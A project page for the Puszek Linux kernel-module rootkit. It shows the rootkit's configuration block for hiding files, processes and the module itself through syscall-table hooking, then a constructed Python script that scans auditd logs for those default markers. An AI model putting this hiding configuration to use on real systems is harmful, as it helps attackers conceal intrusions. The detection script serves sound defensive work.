Open-source software name: Eterna1/puszek-rootkit
Open-source software URL: https://github.com/Eterna1/puszek-rootkit
Open-source programming language: C 99.4%
Open-source software introduction:

Puszek

Yet another LKM rootkit for Linux. It hooks the syscall table.

Features:
Examples:
Configuration:

The configuration is placed at the beginning of file

//beginning of the rootkit's configuration
#define FILE_SUFFIX ".rootkit" //hides files whose names end with the defined suffix
#define COMMAND_CONTAINS ".//./" //hides processes whose cmdline contains the defined text
#define ROOTKIT_NAME "rootkit" //set this to the name of this module to make the module hidden
#define SYSCALL_MODIFY_METHOD PAGE_RW //method of making the syscall table writable, CR0 or PAGE_RW
#define UNABLE_TO_UNLOAD 0
#define DEBUG 0 //this is for me :)
//end of configuration

Tested on:
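As an added example (not code from the puszek-rootkit project), the following scans auditd-style records for the default values in the configuration above. The sample records, the `scan` and `decode` names, and the assumption that the module is loaded with `insmod` or `modprobe` are constructed for illustration.

```python
import os
import re

# Default markers from the configuration above; compile-time, so rebuilt modules may differ.
FILE_SUFFIX = ".rootkit"
COMMAND_CONTAINS = ".//./"
ROOTKIT_NAME = "rootkit"
LOADERS = {"insmod", "modprobe"}  # assumption: module loaded with these tools
HEADER = re.compile(r"type=(\w+) msg=audit\(([\d.]+:\d+)\)")
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def decode(value):
    """auditd quotes plain strings and hex-encodes values with spaces or control bytes."""
    if value.startswith('"'):
        return value.strip('"')
    try:
        return bytes.fromhex(value).decode("utf-8", "replace")
    except ValueError:
        return value

def scan(lines):
    """Return (event_id, reason) for each record matching a default marker."""
    hits = []
    for line in lines:
        head = HEADER.search(line)
        if not head:
            continue
        rtype, event = head.groups()
        fields = dict(FIELD.findall(line))
        if rtype == "EXECVE":
            keys = sorted((k for k in fields if re.fullmatch(r"a\d+", k)), key=lambda k: int(k[1:]))
            argv = [decode(fields[k]) for k in keys]
            if any(COMMAND_CONTAINS in arg for arg in argv):
                hits.append((event, "cmdline contains " + COMMAND_CONTAINS))
            names = {os.path.splitext(os.path.basename(a))[0] for a in argv[1:]}
            if argv and os.path.basename(argv[0]) in LOADERS and ROOTKIT_NAME in names:
                hits.append((event, "module load named " + ROOTKIT_NAME))
        elif rtype == "PATH" and decode(fields.get("name", '""')).endswith(FILE_SUFFIX):
            hits.append((event, "file name ends with " + FILE_SUFFIX))
    return hits

# Constructed sample records in auditd log format (not from the page).
SAMPLE = [
    'type=EXECVE msg=audit(1700000001.100:101): argc=2 a0="insmod" a1="rootkit.ko"',
    'type=EXECVE msg=audit(1700000002.200:102): argc=1 a0="/tmp/.//./worker"',
    'type=PATH msg=audit(1700000003.300:103): item=0 name="/var/tmp/data.rootkit" inode=42',
    'type=EXECVE msg=audit(1700000004.400:104): argc=2 a0="sh" a1=2E2F2F2E2F72756E202D71',
    'type=EXECVE msg=audit(1700000005.500:105): argc=2 a0="ls" a1="-la"',
]
```

Because the markers are `#define` values, an empty result only rules out a build that kept the defaults shown on this page.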